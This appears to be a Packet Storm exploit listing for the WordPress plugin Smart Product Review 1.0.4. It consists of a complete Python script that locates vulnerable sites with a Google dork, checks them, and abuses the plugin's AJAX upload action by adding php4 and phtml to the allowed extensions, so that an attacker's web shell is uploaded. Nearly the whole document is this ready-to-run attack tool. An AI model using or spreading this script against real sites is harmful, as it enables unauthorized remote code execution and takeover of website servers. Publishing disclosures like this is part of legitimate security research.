Lucene search

K
packetstormKeyvan HardaniPACKETSTORM:164999
HistoryNov 17, 2021 - 12:00 a.m.

WordPress Smart Product Review 1.0.4 Shell Upload

2021-11-1700:00:00
Keyvan Hardani
packetstormsecurity.com
482
`# Exploit Title: Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload  
# Google Dork: inurl: /wp-content/plugins/smart-product-review/  
# Date: 16/11/2021  
# Exploit Author: Keyvan Hardani  
# Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/  
# Version: <= 1.0.4  
# Tested on: Kali Linux  
  
import os.path  
from os import path  
import json  
import requests;  
import time  
import sys  
  
def banner():  
animation = "|/-\\"  
for i in range(20):  
time.sleep(0.1)  
sys.stdout.write("\r" + animation[i % len(animation)])  
sys.stdout.flush()  
#do something  
print("Smart Product Review 1.0.4 - Arbitrary File Upload")  
print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)")  
  
def usage():  
print("Usage: python3 exploit.py [target url] [your shell]")  
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")  
  
def vuln_check(uri):  
response = requests.get(uri)  
raw = response.text  
  
if ("No script kiddies please!!" in raw):  
return False;  
else:  
return True;  
  
def main():  
  
banner()  
if(len(sys.argv) != 3):  
usage();  
sys.exit(1);  
  
base = sys.argv[1]  
file_path = sys.argv[2]  
  
ajax_action = 'sprw_file_upload_action'  
admin = '/wp-admin/admin-ajax.php';  
  
uri = base + admin + '?action=' + ajax_action ;  
check = vuln_check(uri);  
  
if(check == False):  
print("(*) Target not vulnerable!");  
sys.exit(1)  
  
if( path.isfile(file_path) == False):  
print("(*) Invalid file!")  
sys.exit(1)  
  
files = {'files[]' : open(file_path)}  
data = {  
"allowedExtensions[0]" : "jpg",  
"allowedExtensions[1]" : "php4",  
"allowedExtensions[2]" : "phtml",  
"allowedExtensions[3]" : "png",  
"qqfile" : "files",  
"element_id" : "6837",  
"sizeLimit" : "12000000",  
"file_uploader_nonce" : "2b102311b7"  
}  
print("Uploading Shell...");  
response = requests.post(uri, files=files, data=data )  
file_name = path.basename(file_path)  
if("ok" in response.text):  
print("Shell Uploaded!")  
print("Shell URL on your Review/Comment");  
else:  
print("Shell Upload Failed")  
sys.exit(1)  
  
main();  
  
`